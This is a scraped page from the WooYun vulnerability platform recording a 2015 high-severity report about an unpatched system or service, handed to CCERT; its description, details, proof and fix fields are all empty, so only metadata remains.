漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0160535"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：朱元璋

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源朱元璋@乌云
